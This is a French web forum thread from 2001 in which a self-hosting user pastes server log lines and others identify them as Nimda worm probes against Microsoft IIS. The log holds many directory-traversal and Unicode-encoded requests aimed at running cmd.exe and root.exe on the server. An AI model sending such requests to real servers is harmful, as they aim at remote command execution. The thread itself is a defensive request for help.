Des choses bizzard dans le fichier log d'un serveur Web ?? - Windows & Software
Marsh Posté le 12-11-2001 à 21:33:41
La ya un type qui a du envoyer un leech et a voulu se connecter a un ftp visiblement il a reussi mais il vouler acceder a un rep qui n'xiste pas
Marsh Posté le 12-11-2001 à 21:36:10
>GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" >404 382 "" ""
>Error reading "D:\HTTPD\monsite\scripts\..%
2f..\winnt\system32>\cmd.exe"
Il s'agit tous simplement d'une attaque liée au ver NIMBA.
Si ton serveur est IIs de crosoft et qu'il est pas a jours alors tu a de grande chance d'avoir été infecté par cette attaques.
Marsh Posté le 12-11-2001 à 21:40:25
j'heberge mon propre site avec omnihttpd
y a un risque d'infection ?
je vois qu'il cherche des rep et des commandes NT , donc je pense qu'il y a pas de pb
Mais bon votre avis ?
Marsh Posté le 12-11-2001 à 21:44:21
j'ai donc été victime de plusieurs attaque en quelques jour :-(
dans le log , y a les IP , ca veut dire que les machines dont proviennent l'attaque sont infectées ? comment les prevenirs ?
:-(
Marsh Posté le 12-11-2001 à 21:45:34
Si je reste sur omnihttpd , je risque pas d'attaque de ce genre alors ?
Moi qui voulais faire un essai , je vous que le net , c'est la jungle :-( vais pas rester vivant longtemps moi
je vais pas mettre le serveur en permanence alors ?
merci de vos remarques et commentaires
Marsh Posté le 12-11-2001 à 21:54:25
Moi en 3 semaine j'en suis deja a plus de 10000 (dix mille)attaques.
Marsh Posté le 12-11-2001 à 21:56:17
le_pacifa a écrit a écrit : Moi en 3 semaine j'en suis deja a plus de 10000 (dix mille)attaques. |
Marsh Posté le 12-11-2001 à 21:58:20
C pas drole sa fait gonfler les logs de appache.
Marsh Posté le 12-11-2001 à 21:59:43
lol moi je croyais qu'on essayait tout simplement de me nicker avec un attaque netbios ou un truc de ce genre ( nbtstat .....)
Marsh Posté le 12-11-2001 à 21:14:11
Voila ce que j'ai pu lire dans fichier log
ca veut dire quoi ? quelqu'un de pas tres intensionné ??
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:59 +0100] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..%2f..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:58 +0100] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..%5c..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:57 +0100] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..S5c..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:56 +0100] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..S5c..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:52 +0100] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..Á?..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:51 +0100] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..À¯..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:47 +0100] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:45 +0100] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 463 "" ""
Error reading "D:\HTTPD\monsite\scripts\..Á..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié n'est pas valide.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:43 +0100] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 500 463 "" ""
Error reading "D:\HTTPD\monsite\msadc\..%5c..\..%5c..\..%
5c\..Á..\..Á..\..Á..\winnt\system32\cmd.e
xe" - Le chemin d'accès spécifié n'est pas valide.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:41 +0100] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\_mem_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:36 +0100] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\_vti_bin\..%5c..\..%5c..\..%5c..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:35 +0100] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\scripts\..%5c..\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:31 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\d\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:30 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\c\winnt\system32\cmd.exe" - Le chemin d'accès spécifié est introuvable.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:29 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 382 "" ""
Error reading "D:\HTTPD\monsite\MSADC\root.exe" - Le chemin d'accès spécifié est introuvable.
ALille-101-1-3-235.abo.wanadoo.fr monsiteinternet.d2g.com - [12/Nov/2001:20:52:28 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 382 "" ""
Merci de vos commentaires et remarques
Salutations
---------------
Les logiciels ne font gagner du temps que lorsque l'on les maitrise parfaitement !!